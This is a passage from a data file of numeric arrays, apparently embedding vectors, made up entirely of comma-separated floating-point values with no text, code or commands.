,-0.032270186,-0.004673503,-0.007840573,-0.021635229,-0.03566019,-0.021399064,0.011985198,-0.024505872,0.029579671,0.015497394,-0.045700435,0.04199607,-0.027786413,-0.008468947,0.040861223,-0.052625988,-0.016899876,-0.0030742898,0.03609696,-0.033925682,-0.01601806,-0.010913207,0.038524497,-0.06732521,0.041509848,-0.027647711,-0.078621864,0.022302141,-0.0114854975,-0.007105286,0.016355535,-0.0003995289,-0.048512243,0.023180187,0.009055852,-0.007266567,0.029765893,0.0043737376,-0.033162855,0.05735613,-0.04545754,-0.033664044,0.005615595,-0.012813323,-0.03308774,0.05427675,0.045724723,0.008969461,-0.002551569,-0.0013926281,-0.0014812688,-0.028504102,-0.0068244226,-0.019524498,-0.03994666,0.0732091,0.0010333835,0.0014299278,0.05575333,-0.08304915,0.0008829176,-0.03377761,0.017078307,-0.033505123,-0.024531301,0.013756364,-0.03142043,-0.034535352,-0.0074867886,0.006494882,0.053013362,-0.032506734,-0.018510414,-0.06118631,-0.026049718,0.050721433,-0.0035721415,0.063676275,-0.016377581,-0.049799167,-0.010177503,-0.01771633,0.021018485,-0.0076316325,0.013265226,-0.021401092,-0.09388415,-0.020497901,0.05348452,-0.09192729,-0.018500082,0.03774907,-0.023602042,0.004879612,-0.015279558,-0.1085331,0.028934505,-0.07684864,-0.013667098,0.02908043,0.019293124,-0.0016762341,-0.015693974,0.05841961,-0.011345759,0.003912831,-0.005392993,-0.025822036,-0.03657488,0.0030234002,0.015446442,0.017573966,0.0073429034,0.0659473,-0.030240227,-0.009093619,0.008808633,-0.04105964,0.014882136,-0.03669292,-0.03167825,-0.02978925,0.030319024,-0.007066918,0.063074976,-0.0139504485,-0.01130713,-0.013772262,-0.00701669,-0.046065934,0.057249464,-0.01893673,0.019044226,0.00029708495,-0.013393624,-0.06976402,-0.01985508,0.053268697,-0.042179257,0.0034548722,-0.051083144,-0.0488061,-0.10251994,-0.00074667507,-0.020083645,0.014194351,0.015075863,0.02258085,0.05300971,-0.01257751,-0.0047590574,0.0319365,0.06017629,-0.060124002,-0.0013641971,0.006292868,0.05255113,0.013965775,0.02159005,0.069599554,0.027727572,-0.02549623,0.025621759,-0.02284703,0.04749927,-0.019330744,-0.110307455,-0.023214163,0.014368521,0.014276986,-0.017633375,0.006033028,-0.020930676,-0.0019222063,-0.04417829,0.011063907,-0.06293943,-0.04109097,0.0134195145,0.026872216,-0.047886092,-0.014333429,-0.007996132,0.017371032,0.06588215,0.01905641,0.01680054,0.017993592,0.015275254,-0.04141007,0.03595112,-0.023720773,0.04352947,-0.11066305,0.019425709,0.005287588,-0.03057315,-0.042832687,0.0004617986,-0.022603735,-0.012865383,-0.028178588,-0.008722077,0.03966456,-0.025049549,-0.0067465855,-0.056291673,0.03709684,-0.02248956,0.0051313755,-0.0057531437,0.021601448,0.014974271,0.021419123,0.024583507,0.03214002,0.004076074,-0.04841972,-0.056366306,0.014701159,-0.020156918,0.035677064,-0.01608641,0.041491076,-0.009732178,-0.008343405,0.018796701,0.010846689,0.022729466,-0.0069763414,-0.022613445,-0.009099703,-0.0052445773,0.0070787,0.032627195,-0.06900306,0.011760368,0.02113881,0.014441796,-0.026069501,-0.06833081,0.042053506,0.010260388,-0.032410868,-0.041505005,-0.033380393,-0.013382966,-0.020400805,-0.027795227,-0.0033320072,-0.028897582,0.050509166,0.004647845,0.061544534,-0.028817566,0.05650662,0.047790762,-0.029782986,0.046038784,0.031017696,-0.01507031,-0.00059194013,0.008060184,-0.004698943,0.048381705,0.021600096,0.07527512,0.02196336,0.017662836,-0.0315974,0.016584212,-0.034727715,-0.043909594,-0.031481005,-0.048651494,-0.030865965],[0.0055082263,0.003900613,-0.17955378,-0.020391067,0.07313354,-0.06721088,-0.022828566,0.0028024006,0.03592333,-0.07597733,-0.015722038,0.03608571,0.03984549,0.014273702,0.04065349,-0.042138685,0.019718159,0.0064178025,-0.03691258,-0.006493017,0.008954964,-0.062747374,0.02573397,-0.08216507,0.08561335,0.038071573,-0.0068550818,0.015902217,-0.0071750204,0.016685138,0.043936785,0.035349123,-0.02424543,0.029941155,-0.03594339,-0.040122442,0.007968981,-0.009332726,-0.02774785,0.0008861209,0.03899329,0.006242518,-0.0054718344,-0.07795723,-0.017209155,0.01758799,0.031693436,-0.013987784,0.05314477,-0.116518,0.0068929587,-0.0483182,0.0007908473,-0.06537313,0.08206802,0.03571564,0.014727973,-0.027588906,-0.025750091,-0.07950272,0.037673086,0.039717402,0.011731381,0.0768124,0.03730994,-0.04686028,-0.05654156,0.06456049,0.023256943,-0.01792976,0.038447797,-0.026359763,-0.00066132017,-0.019408027,-0.019921934,-0.019774798,-0.045511868,-0.023677308,0.011057591,0.036861174,0.033427734,-0.045082554,0.10218877,-0.0066762324,0.037938602,-0.01576915,-0.035943065,-0.02465775,-0.019362645,0.023846019,-0.013316036,0.00006256347,0.01353085,0.021099757,-0.068034165,0.0061739003,-0.0012845568,0.0071454938,0.012510549,-0.03492769,-0.030634286,0.024013104,0.022064662,0.00432035,-0.039872106,0.05881252,0.0032462748,-0.00055606215,0.006143007,0.0063149557,-0.010354512,0.05401904,0.017063413,0.0010762782,0.046933897,-0.05221674,0.018169489,0.01842622,-0.021385165,0.029548336,-0.030076789,-0.030946022,-0.0032431693,0.03354832,0.07977163,0.038011327,-0.0520312,0.051965907,-0.0066235936,-0.064621285,-0.022817727,0.004244434,-0.025940087,0.016101904,0.009295767,0.050804716,-0.054452375,-0.04892576,0.029177709,-0.0134039335,0.028768199,0.05010441,-0.0031682963,-0.041568574,-0.018566664,-0.044150762,0.031615626,-0.008498778,-0.07508769,0.008644331,-0.025686186,0.020579679,0.00032313998,0.032420754,0.02879063,-0.0078410795,-0.016727107,0.030125422,-0.017692346,0.043583915,0.0007102853,0.015097053,-0.070383236,0.05154535,0.029771678,-0.049843334,0.006574737,0.06835333,-0.019185912,0.036542866,-0.03211517,-0.018395353,-0.04270754,0.013384585,0.0068045654,-0.012388885,0.014683256,-0.053848427,0.016417533,-0.044601496,0.010225675,-0.050445072,0.025427433,-0.010893756,-0.055778187,0.009902051,0.025200361,-0.06790301,-0.011734737,-0.017292598,0.05422984,0.016296195,-0.041616496,0.0050367443,-0.041414592,-0.02867231,0.024856204,0.0254686,0.015139373,-0.034997065,-0.041550003,-0.0046425937,-0.002873385,-0.00768099,-0.036183607,-0.002231378,-0.0060968515,0.039509658,0.0014438712,0.011950231,0.06049319,-0.020720262,0.012602363,0.00080504373,-0.023986585,-0.0024347985,0.022033168,-0.06531899,-0.06532799,-0.02571816,0.04640286,0.0015881046,0.02912877,-0.016065633,0.020768672,0.019007102,0.003189994,0.012296581,-0.013067961,-0.040860258,0.0005809363,-0.08415713,0.037195507,0.022999771,0.008792858,0.02659951,0.012647586,0.12629767,0.013861447,0.038385887,0.0027325363,0.022137776,-0.00014528318,-0.011584982,-0.042417012,0.00057238765,-0.05451455,-0.03887024,-0.024131415,0.034043804,0.0020572057,-0.022679703,0.03672551,0.0083374055,0.043710846,-0.07218454,-0.0377918,0.016568,-0.0033709528,0.008961776,0.04094911,0.04271122,-0.013329759,-0.03578942,0.0060276855,-0.06331803,-0.031032579,0.019151496,0.040243622,0.042217117,0.021466604,0.017126277,0.014840629,0.059683587,-0.03615247,0.020741671,0.022693684,-0.048082624,-0.018590026,0.0083932765,-0.051169846,0.0047465414,-0.029450938,0.020071339,-0.009445784,0.026799796,0.022880994,-0.011496222,0.00044694592,-0.018532759,0.032793242,0.009484947,-0.07073209,0.07020625,-0.020780325,0.00069896854,0.033299763,-0.015980843,-0.00984033,0.01559813,0.047276035,0.02604609,0.03546603,0.07953266,0.010270781,-0.0061177514,0.02800463,0.015093104,0.008703429,-0.026276343,-0.040429205,0.030374534,-0.05305854,0.06055544,-0.026475778,0.020105325,0.03822898,-0.0033402562,0.0110305175,0.016481062,-0.020568747,-0.035910618,-0.0023529273,-0.027915183,-0.04779479,0.06425948,-0.0242469,0.03398961,0.0001932115,-0.029873244,0.04847978,-0.003022366,0.042769633,-0.06756421,-0.005323974,0.021923658,0.024723263,-0.0004578376,-0.032600947,0.033003826,0.013795251,-0.04560286,-0.00073817046,-0.007845797,-0.02273288,-0.00681549,-0.03278489,-0.00846003,0.012374502,0.02692035,-0.054813083,0.021382436,0.007878012,0.010493662,0.009182185,-0.005160862,0.017752368,0.025883496,-0.005672228,0.0165164,0.024304686,0.02946121,0.019671364,0.015471715,-0.027235119,0.059093803,0.046441577,0.026340116,-0.00034182562,0.014141717,0.02140235,-0.010471152,0.00044675637,-0.022393938,0.021978967,0.02549672,-0.072200455,0.034467075,-0.011795058,0.016621025,0.025814803,-0.037094668,-0.031173127,0.026953474,0.032149605,-0.0059482655,0.030771956,0.009198603,0.024043793,0.042469945,-0.028021239,-0.0496203,-0.01087398,0.0001411191,0.017748564,-0.00060066755,0.002874978,-0.01457819,0.0055770106,0.045852844,-0.031099979,-0.05718271,0.03850734,0.012828735,0.037015527,0.00670797,-0.00074594206,-0.0452542,0.0978248,0.01274383,0.05982201,-0.0016787845,-0.021480408,-0.02632736,0.010610685,0.004908569,0.07000839,0.04021023,-0.023023,-0.047438934,0.0060965396,0.017363744,0.008751865,-0.016853318,0.008439508,-0.014957588,0.0030719459,0.029957296,-0.0024393883,-0.04842623,0.00507697,0.020241387,0.03561775,-0.031464428,-0.015185181,-0.054301295,0.043827325,0.037886333,0.024171846,0.071403414,0.025987174,0.00349696,-0.05063716,-0.06688214,-0.031597964,0.0727637,0.100935765,-0.07376334,-0.044054992,0.019144122,-0.0047085765,0.023181047,0.019922234,0.045277655,0.12009966,0.0051062237,0.008515739,-0.006613803,-0.021370037,-0.022640616,0.026227722,0.01618835,-0.040080775,-0.0103623755,0.030970367,0.037014123,-0.04387897,-0.033349235,0.05558766,0.097096674,-0.041827567,-0.03892893,0.0119796805,-0.010926165,0.033533394,-0.013719058,-0.026126584,0.0031523644,-0.010211416,0.065938175,0.035472546,-0.051556222,-0.036379915,-0.06958584,-0.0035362802,0.026153523,0.012289531,0.018094033,0.014326079,-0.012833105,-0.010896437,-0.007951934,-0.0614822,-0.0016267735,0.0056655705,-0.030842084,-0.030521272,0.012716124,-0.008153615,0.009071128,0.026986524,0.008457393,-0.040885776,0.013980293,-0.010470317,-0.013580892,0.066163965,-0.059449203,-0.035439998,-0.030011088,0.031268828,-0.018246293,-0.0012955813,0.020965183,0.040185824,-0.05153829,0.040685084,-0.03649189,-0.10456643,-0.011964355,-0.002510606,-0.0110421665,-0.013177426,-0.011683026,-0.08184774,0.013613252,-0.004369985,-0.03560864,-0.0049599246,0.011726276,-0.03840655,0.02789792,-0.0665926,-0.031307086,-0.005501264,-0.00021174524,-0.039448254,0.027981766,0.0067253164,0.025788818,0.033570763,0.028922254,0.0036798848,-0.01683007,0.003293655,0.006476807,-0.022771522,0.08799013,-0.023144072,-0.0140710035,0.07193627,-0.057237513,-0.020753995,-0.008909145,0.018451326,0.0024953051,0.00025230303,-0.012183289,-0.03766615,-0.004586765,-0.038998295,0.016056685,0.019627027,-0.01922344,-0.003005254,-0.056335416,0.0054415357,0.062481195,-0.021560773,0.06760999,-0.0040430976,-0.033942163,-0.036663145,-0.0143279545,0.016820652,0.0051256195,0.042885754,0.004559511,-0.067613095,-0.0237994,0.028170705,-0.073942475,-0.02386464,0.034385964,-0.013584404,-0.04010331,-0.052732226,-0.052463487,0.043205556,-0.067529514,-0.015040124,0.039675865,0.028083853,-0.003769099,0.0064871986,0.041846897,-0.03778002,-0.020689866,-0.029035578,-0.05065789,0.0011811925,0.022361353,0.019364422,0.029388975,0.026663963,0.03524467,0.00027380654,0.022114044,-0.0003953296,-0.019764895,0.027889347,-0.0022159545,0.007994657,-0.038880244,0.004429232,-0.021392593,0.015445648,0.014307949,0.0017701049,0.012034339,-0.0136385085,-0.031201757,0.06991688,-0.020665217,0.03896383,0.0086701205,0.011516187,-0.046039637,-0.00011812524,0.014241195,-0.05459694,0.022579182,-0.03991577,-0.060653564,-0.10485534,0.009213525,-0.04226107,0.031924795,0.020927304,0.01716059,0.066050224,0.019519847,-0.014946899,0.035359662,0.039098103,-0.030908553,0.034570936,0.05041434,0.054982487,0.01579527,0.059879582,0.06805114,0.04946995,-0.006704397,0.0029076994,-0.034526955,0.05532781,-0.018176777,-0.10355496,-0.028499885,0.026224177,0.0048915823,-0.019003024,-0.0067908894,0.0040072855,-0.015523896,0.006631815,-0.004558953,-0.03856534,-0.037288696,0.018632118,0.04962107,-0.016088907,-0.06508178,-0.010703159,0.010827906,0.05423453,0.03269134,-0.00019770836,0.002791378,0.026325153,-0.028257003,0.024701534,-0.04433326,0.05586793,-0.08569009,0.035258923,0.016933873,-0.05471144,-0.02568124,-0.011101757,-0.026359746,-0.022908986,-0.01173308,0.008152269,0.0539281,-0.019859388,-0.023773964,-0.07887282,0.047505308,0.02489256,-0.026120493,0.016782021,0.012342751,0.015645463,-0.0060015884,0.02676221,0.022679785,-0.017163469,-0.026110541,-0.026965609,0.027281284,0.02230339,0.054785177,-0.019696886,0.061828732,0.013225252,-0.03610473,0.027163694,0.048739932,0.04798394,-0.0040919096,-0.046439867,-0.0028585414,0.0021833144,0.023346277,0.043099962,-0.0021408962,0.029159207,0.0060068895,0.013447306,-0.021798667,-0.031673227,0.021544259,0.02047489,-0.0077682664,-0.049816623,0.0016006001,-0.039972987,-0.019295929,-0.051873423,0.010709902,-0.014877647,0.046331342,0.0019586384,0.017324604,-0.041297596,0.05093409,0.0011503272,-0.015538742,0.04076835,0.042288847,-0.031189442,-0.03240948,-0.026342947,0.0030115398,0.014877549,0.02468536,0.0998739,0.025222054,0.05067957,-0.032914303,0.026524942,-0.029255522,-0.042766735,-0.008613011,0.0031417797,-0.053911366],[0.016426995,0.028873986,-0.11889851,-0.10514323,0.063952744,-0.049350604,-0.006770673,0.025001444,-0.052471247,-0.05598977,-0.10901641,0.102090426,0.05585929,-0.047491204,0.02342086,-0.04710856,0.0160718,-0.08794567,0.011604747,0.05081613,-0.028302593,-0.030962171,0.022677895,0.0153292315,0.09892827,0.047003843,-0.017628951,0.025535759,-0.020200843,0.006950757,0.034960784,-0.026603585,-0.0026044636,-0.053610474,-0.09628203,-0.061139725,0.0067670993,-0.03117925,0.0051861955,0.018819166,-0.015973225,-0.038798664,0.04151944,-0.010140566,0.062199887,-0.0455163,0.06532624,0.031543765,0.041928224,-0.09846303,0.03136003,-0.009955396,-0.021002926,-0.01315146,0.060901664,0.021929689,0.0097349575,-0.00048567416,0.022514965,-0.009261467,-0.012664417,0.09939499,-0.019818177,0.07540655,0.03412554,0.024223361,-0.016691608,0.035251833,0.013462181,-0.008218987,0.054787986,-0.023128716,0.008715726,-0.016827751,-0.018336764,0.0107130725,-0.026694322,-0.061918113,-0.018791845,0.062038336,-0.011235326,-0.040535923,0.026953015,0.0010330158,0.00065398315,-0.00633275,-0.010572547,-0.012983509,-0.040655434,-0.00030714695,-0.047044914,-0.043370683,0.0077360487,0.02083579,-0.037796553,0.006543473,-0.030221993,0.022825105,-0.028926766,-0.045236856,-0.0015934468,-0.028841583,0.007451519,-0.058693156,-0.024612138,0.05362149,0.038918015,-0.024643019,0.02647045,0.004627723,-0.004360278,0.03304454,0.013511501,-0.030945916,0.053865172,-0.0051003136,0.0681985,-0.036673326,0.023965847,0.089953035,-0.026066475,-0.047631674,-0.013657593,0.01135725,0.033279765,0.038968876,-0.045385394,0.0100174965,0.04180558,-0.044829745,0.03366053,0.0048721996,-0.07035917,0.0063968375,0.060625076,0.03670789,-0.031865694,-0.055540558,0.06444524,-0.019802738,0.029028919,0.026519306,-0.029001635,-0.012868096,-0.006403053,-0.026850933,0.040694803,-0.0028569559,-0.06766312,0.043554608,-0.03337174,0.04218146,-0.014889784,0.06508111,0.028610311,-0.024374196,0.038371675,0.0026390483,0.046796665,0.0076456787,0.06922635,0.01210097,-0.055685714,0.04713467,-0.006387545,-0.024740245,0.00092011504,0.062104125,-0.00021981397,-0.0006923083,-0.040829852,-0.045665592,-0.021355513,0.0031242762,-0.027761865,0.0024845237,-0.011373919,-0.0109858615,0.03308343,0.0041960576,0.034313418,-0.020861708,0.0598455,0.008636812,-0.023950573,0.008192697,-0.024704771,-0.0010706752,-0.026881883,-0.014241327,0.062116735,0.03965254,-0.04014436,-0.030948875,-0.025633534,-0.05155309,0.018408816,-0.035226725,0.029714819,-0.0400306,-0.03354252,0.0018521919,0.013802835,-0.0029334277,-0.053198807,0.02644844,-0.023717968,0.019852106,-0.043469004,0.045077987,0.035988983,-0.007322029,-0.0064946497,-0.00516853,-0.010872727,-0.015598938,0.019715862,-0.009054554,-0.055444717,0.012012155,0.017232869,-0.024721242,0.0140543375,0.007977478,0.05937119,0.027295463,-0.015829373,0.0052602133,-0.040696166,0.0011967237,-0.06378642,-0.080858424,0.031284235,-0.0032751018,0.021794464,-0.011887657,0.016572699,0.078939065,-0.012294418,0.015033148,0.039614525,0.014158703,0.005207326,0.01259438,-0.012839888,-0.018466186,0.01913629,-0.0031409797,-0.009012668,-0.006049841,0.009289486,0.023719408,-0.0137704015,0.06479525,0.03488746,-0.02048539,0.016356653,0.027572548,0.02705586,-0.037884377,-0.0005991482,-0.012778949,0.035038803,-0.05597896,-0.030304184,-0.04821781,-0.047998093,-0.021262031,0.0031949314,0.025876688,-0.034569543,0.014133513,0.057970967,-0.01597604,0.0037813527,0.021085927,0.03784837,-0.012004465,-0.029195458,0.0124381855,-0.036097944,-0.03691309,0.02057948,0.006063226,-0.00356413,-0.043684155,0.0046453625,0.013725721,0.0049486053,0.009232646,0.034536205,-0.021734584,-0.04017946,0.05054563,-0.004210171,0.037958577,0.06473717,-0.0005446233,-0.005910025,-0.027496122,0.023608996,0.047126967,0.024528394,-0.01943269,-0.01705365,-0.03317484,0.008665352,0.009711027,-0.021562386,0.014048936,-0.06013311,-0.028803995,0.005869451,0.043909695,-0.07186161,0.048077524,-0.00843,-0.0045661624,0.037548527,-0.031544346,-0.030956283,-0.069446094,0.018869516,-0.023114473,-0.004643039,0.035970144,-0.014898366,0.048689328,-0.034396134,-0.07361401,0.035255156,0.028973812,0.046542723,-0.024253692,-0.06438258,0.013097219,0.018804032,-0.005690274,0.00771933,0.06911051,0.03492813,0.0066154134,0.041821603,-0.003878068,0.0077417027,0.014848356,-0.04079307,-0.009913384,0.035029728,0.012914085,-0.049847685,0.048872925,0.026279638,0.009823626,-0.011683274,0.0046877945,0.015516254,0.0023993105,0.03043482,-0.011133705,0.06352091,-0.010565005,0.02110601,0.017709835,-0.0033572284,0.037209447,-0.009874904,-0.006874739,0.014979509,-0.016095608,-0.06401916,-0.031536523,0.04021482,0.040246077,0.0019583707,-0.04310507,-0.05057226,0.011160709,-0.0004491919,0.04547442,0.015544716,-0.041333828,-0.026029933,-0.01541977,0.026121898,0.011378204,0.023892725,-0.02038673,-0.013762196,0.060594566,-0.0038987834,0.003238986,-0.005116159,-0.027145257,0.029123457,0.00020115126,0.057967037,-0.012729656,-0.054907307,-0.0047194636,-0.09235721,-0.09206114,0.01569509,-0.008367983,-0.046338916,-0.0130544035,-0.001571447,-0.028487291,0.020089375,0.009545449,-0.003718259,-0.0011537169,0.03435708,-0.065703645,0.012048269,0.008928119,0.085532926,0.07031696,-0.041031543,-0.01310555,0.0139147,0.035665818,0.019949898,-0.0051609874,0.030007044,0.026802704,0.018528169,0.03285359,-0.00090576644,-0.072128154,0.012379802,0.056723718,0.027377915,-0.0075946534,0.0018553643,-0.0029149984,0.018697446,0.023984147,-0.01520523,0.05060544,0.065910704,-0.021287093,-0.042053834,-0.002824221,0.031121282,0.07795506,0.07437289,-0.091490746,-0.011708674,0.017375527,-0.019103512,0.047784097,0.00077075977,-0.022160968,0.08901516,-0.008393246,0.027176406,-0.0025881422,-0.02291228,-0.035112355,-0.018310428,-0.013304894,-0.043496136,0.0003095312,-0.018415784,0.007588153,-0.00017475738,-0.017062947,0.025261413,0.07884575,-0.057693146,-0.0059327614,0.024533696,-0.013943904,0.013069126,0.0002544765,0.0026319863,0.019080348,0.0026484726,0.0547569,0.041987337,-0.048907746,-0.04629886,-0.041370433,-0.021048047,0.077480204,-0.0052372804,-0.008507735,-0.020113716,-0.014267687,0.00044971154,0.00077866926,0.027185619,0.019124655,0.006179861,-0.021473063,0.008757792,0.043597978,0.0014805797,0.026122686,0.0054068333,-0.007842086,-0.030857014,0.064809136,0.03407737,-0.012228201,0.092685714,-0.0044741207,-0.047710575,-0.06990872,0.04682803,-0.06566884,-0.004996943,0.0008590392,0.07761273,-0.07275058,0.0391106,-0.008324286,-0.07478916,-0.039332196,0.031464864,-0.06186178,-0.00743942,-0.03737476,-0.04703787,0.025344651,-0.011938534,-0.024357995,0.05613136,-0.03402739,0.0152036175,-0.021065151,-0.0039205593,0.0070920032,0.008832662,-0.029620556,-0.035225853,0.030793857,0.011509259,0.01646611,0.025213694,0.032165874,-0.00047392285,0.014929487,-0.03436096,-0.023469796,-0.0061540646,0.03129839,-0.00047310969,-0.017586097,0.029420737,-0.028461097,-0.03588736,-0.039426636,0.03347265,-0.02885773,-0.014259168,-0.037995834,0.0010885625,-0.05097172,0.0013781859,0.0015648188,0.052797444,0.042447973,0.02885045,-0.007886925,-0.024946725,0.023942225,0.0069799745,0.045273267,-0.019039677,-0.030684544,-0.020424327,-0.020105168,-0.011923966,-0.0028233218,0.030617138,0.010937476,-0.02184807,-0.035181317,0.018672464,-0.018240774,0.042834677,0.044882067,-0.061917085,0.03533094,0.020877745,-0.033462152,0.023553949,-0.023382062,0.0005086812,0.0036527938,0.04019283,-0.017274609,0.055522986,0.032431103,-0.033749625,-0.013973821,0.00950478,-0.025780229,-0.014262552,0.04913994,0.057361227,-0.07251565,-0.009311902,0.052370634,-0.025494829,0.029833911,-0.001144617,-0.004286808,0.01571177,0.0055631287,-0.00923428,0.018559856,0.030813944,-0.030899443,0.013062412,0.027906256,-0.010548549,0.00600598,0.015425735,-0.041963775,0.049862053,-0.019079734,0.08045431,0.014070385,-0.017703248,0.0000147375,0.04615696,0.042473547,-0.04804854,-0.004088119,-0.11214271,-0.02009085,-0.033145696,0.05008049,-0.056398373,0.040486474,0.020740127,0.082612336,0.06519528,0.009450811,-0.033806037,-0.008661223,-0.019601755,-0.038943198,0.02634862,0.022219246,-0.0023100113,0.011526492,0.08551063,0.11377686,0.01644997,-0.023542333,0.04611912,-0.03794639,0.03510287,-0.010755597,-0.06869316,-0.037603986,0.014901401,-0.045136727,-0.028618226,-0.01186787,0.044901006,0.011546437,-0.07823255,0.006422458,-0.039769776,-0.048397556,-0.027316159,0.0077516353,-0.029328331,0.0065718144,0.026457744,-0.003914622,0.067521535,0.05010351,-0.029600313,-0.030603237,0.037817497,0.0017533377,-0.0022673043,-0.0065843314,0.0012373073,-0.07004142,0.04144703,-0.02528738,-0.048738122,-0.0033614535,-0.006752698,0.035099965,-0.0344922,-0.021799892,-0.028122846,0.044863123,-0.012842672,-0.029056974,-0.028230347,0.057493266,0.024883451,0.0011544857,0.0045925006,0.049784902,0.0070596905,0.0155603625,-0.045600113,0.021273496,-0.07288324,-0.0119987605,-0.017461913,0.018731931,-0.0045789042,0.031842984,0.021230487,0.039475046,-0.035612106,-0.0123246815,-0.007441401,-0.0035099667,0.010939649,0.03367272,-0.056603678,0.038121548,-0.013289472,0.0074613504,0.0014518378,-0.028621033,0.0024266865,0.021747326,-0.0032997604,0.020526316,-0.07334499,0.058157306,-0.008432212,0.004834381,-0.048522417,-0.049686268,-0.043281555,0.0055252053,0.012312463,-0.005759561,-0.020678544,-0.0062039723,-0.010192715,-0.070411265,-0.038642567,0.022145014,0.04393661,-0.036343344,0.036778186,-0.03180244,-0.023792572,0.024006575,0.02149606,-0.018948475,-0.012590689,0.051492896,0.040424068,-0.0030409447,0.0016335119,-0.024774628,0.0016701962,0.005424395,-0.045257546,-0.043018464,-0.03793387,-0.011743747],[0.0150967045,-0.0025648624,-0.11016963,-0.07230567,0.041857295,-0.047778122,-0.043317776,0.008185013,-0.050394803,-0.09047137,-0.056144174,0.083498344,0.061225343,0.011459009,0.023554249,-0.043213848,0.0069656353,-0.07189539,0.015232865,0.067177996,-0.033665143,-0.060693484,-0.011716001,-0.016708963,0.08095986,0.034521412,-0.012388311,0.045243006,-0.0017012816,0.008882062,0.05111339,-0.022825833,-0.017056277,0.0034504237,-0.102035955,-0.06412637,-0.0017357264,-0.018828515,-0.040476374,0.050327133,0.05247217,0.0020155075,0.035463896,-0.0007154232,0.07427134,-0.040159054,0.055151872,0.011776025,0.063574106,-0.09084512,0.009719393,-0.0065793823,-0.0016797059,-0.048703477,0.040046822,0.039193243,-0.017433167,0.022403952,0.019654056,-0.041559007,0.0077503175,0.06300768,0.0043965597,0.08852867,0.0299644,0.009324901,-0.012410187,0.05074076,-0.0026155387,-0.041494466,0.03952341,-0.05250162,0.023294605,-0.021081913,-0.014754394,-0.021568526,-0.043018848,-0.034828115,0.0018018094,0.019217124,-0.0072520343,-0.030021243,0.051767673,-0.0033834476,0.021379847,-0.004611122,0.0035435667,-0.00032452753,-0.06324411,0.058763865,-0.047511593,-0.0393884,0.008853942,0.028133241,-0.017137505,-0.03681783,-0.016577985,0.020552551,-0.015710685,0.0012969867,-0.01990305,-0.017357273,0.03244386,-0.0049994844,-0.039345693,0.042267498,0.010928949,-0.004583535,0.033822868,-0.010281545,0.021193804,0.0055700955,0.048750885,-0.012425896,0.019194435,-0.039897744,0.070422895,-0.029051641,0.0057740393,0.094531104,-0.035519406,-0.037224054,-0.0072931154,0.030146342,0.030472426,0.055930275,-0.020855634,-0.015037234,0.022994028,-0.04338747,0.010685565,0.022920886,-0.026678447,0.014558444,0.051677626,0.03400567,-0.054929968,-0.0324967,0.0575269,-0.005088307,0.0040004784,0.006577784,-0.020572122,-0.046666376,-0.010835243,-0.027243976,-0.00086058455,-0.02856827,-0.05484971,0.04089763,-0.015665753,-0.010035358,0.022248387,0.037262812,0.011980717,-0.016131628,0.057944663,0.0077345483,0.033283126,0.04757891,0.045091007,0.035174653,-0.02835931,0.05479792,0.0006347001,-0.047104623,-0.019885989,0.058578998,-0.017874578,-0.023565678,-0.02972497,-0.07241132,-0.02538194,0.022297256,0.0040205303,-0.026931576,0.045848027,-0.009536738,0.031678934,-0.04186715,0.007933767,-0.01597247,0.04713925,0.055076253,-0.04183478,0.0068321847,-0.038685504,-0.0067582256,-0.025589932,-0.031729043,0.07161073,-0.0014144713,-0.05377797,0.011685591,-0.030793574,-0.06623021,0.031018896,-0.010905026,0.027788011,-0.02183685,-0.024368161,0.008975469,0.011416651,0.0032444717,-0.035607163,0.03557373,-0.005705507,-0.014810381,-0.049950346,0.03462476,0.07657943,-0.004241565,-0.022317033,-0.04408142,0.030634863,0.0036375762,-0.0056073703,-0.052236415,-0.04572727,0.03479749,-0.013699107,-0.0012513571,0.03602872,-0.01217984,0.009286413,0.034181204,0.023106148,0.04135371,-0.0018268167,-0.022731166,-0.07179592,-0.06036256,0.015251382,0.055763833,0.021208545,0.004274963,-0.0021321818,0.09450092,-0.010516032,0.0042513334,-0.004931524,0.02878829,-0.016794842,0.029246159,-0.0051673325,0.024446275,0.011716166,-0.01684315,-0.02175744,0.01923611,0.008849028,0.019463837,0.021776605,0.039449394,0.08949152,-0.044506248,0.009334086,0.022856731,0.040204998,-0.0115130115,0.06464145,0.020470576,-0.032009594,-0.061795093,-0.019772135,-0.04739969,-0.025185753,0.0093159005,0.02075902,0.01854368,0.009821617,0.049779624,0.046912353,0.028552808,-0.046554305,0.0024075564,0.07260911,-0.038309973,-0.02482244,0.030798579,-0.0103584295,-0.0035733872,0.004860844,-0.009485285,-0.004063534,-0.025903476,-0.010096721,-0.01053105,0.026337095,0.0064399173,0.032144327,-0.03927737,-0.04535849,0.05872966,-0.020048508,0.0069574188,0.049927536,-0.010136308,0.0072033233,-0.0016030067,0.013678692,0.033504035,0.031559043,-0.00009544892,-0.028662506,-0.033197533,0.049524885,0.028689431,0.006923496,-0.01182825,-0.020680413,-0.013431736,-0.01813171,0.057244167,-0.04027853,0.029555017,0.01228115,-0.013021546,0.038962383,-0.0050507914,0.0022573937,-0.048827462,0.025117904,-0.017138042,-0.01429821,0.023428466,-0.07065643,0.035116795,-0.027803369,-0.07350804,0.04876384,0.055651918,0.07319932,-0.0063976883,-0.0044023534,0.010646223,-0.009818647,0.016317142,-0.011896275,0.084063,0.014440741,-0.0058986554,0.039123766,-0.004008384,0.0019898948,0.028139438,-0.033118673,-0.0014576942,0.020673117,0.055163816,-0.030258983,0.033757348,0.010623718,-0.010101179,-0.0043143476,0.025272457,-0.0016167938,0.009811685,0.0159819,-0.000025855423,0.037878867,-0.0044677607,0.0043249037,0.008565091,0.011046909,0.074982926,-0.013653512,-0.033649854,-0.024753876,0.017887,-0.06316655,-0.046285797,0.0468705,0.03130785,-0.011959502,-0.018395768,-0.060582336,0.031943608,0.02822105,0.032488447,0.02633194,-0.09136605,-0.015075848,-0.0042422903,0.015829735,0.013127538,0.009326817,-0.035765342,0.011169798,0.041253764,-0.0007336931,-0.034920625,0.009984942,0.014189069,0.012636871,-0.02983133,-0.0011845733,-0.007852575,-0.028084073,0.018943088,-0.08932113,-0.05840077,0.0063989293,0.002841124,-0.031300556,-0.0029858497,-0.004575222,-0.042433552,0.04588785,0.0017830519,0.031328347,0.0072240513,0.01275697,-0.05708361,0.006614872,0.017827755,0.065533124,0.034056652,-0.008064428,-0.018236395,0.010642854,0.06270642,0.007917313,-0.012152583,0.035550725,0.041064605,0.026881222,0.052261557,0.019664064,-0.048681952,0.0070848526,0.026755301,0.06379396,-0.02179133,-0.00037100137,-0.03686847,0.020115985,0.07152254,-0.043662764,0.004163245,0.050764106,-0.033325266,-0.036956012,-0.047378402,0.006921139,0.08188419,0.08216204,-